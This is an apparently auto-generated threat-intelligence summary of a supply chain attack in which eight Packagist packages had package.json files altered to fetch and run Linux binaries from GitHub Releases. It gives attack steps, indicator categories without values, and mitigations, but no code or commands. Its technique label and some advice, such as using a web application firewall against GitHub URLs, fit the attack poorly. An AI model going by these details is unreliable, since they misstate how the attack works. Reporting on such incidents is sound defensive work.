Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware

A coordinated supply chain attack campaign has impacted eight Composer packages on Packagist, injecting malicious code into package.json files to retrieve and run Linux binaries from GitHub Releases URLs, targeting projects that ship JavaScript. The attack affects projects using these packages. The attack vector is a code injection vulnerability.

1. Malicious code injected into package.json files to retrieve and run Linux binaries from GitHub Releases URLs.
2. Eight Composer packages on Packagist affected, targeting projects that ship JavaScript.
3. Attack chain involves retrieving Linux binaries from GitHub Releases URLs and executing them.
4. Detection opportunity: monitoring for suspicious GitHub Releases URL access and Linux binary execution.

T1204.001 User Execution of Malicious Code via GitHub Releases URL

GitHub Releases URL, Linux binary filenames, affected package versions

Update affected packages to the latest version, monitor for suspicious GitHub Releases URL access and Linux binary execution, and implement a web application firewall to block malicious GitHub Releases URL access.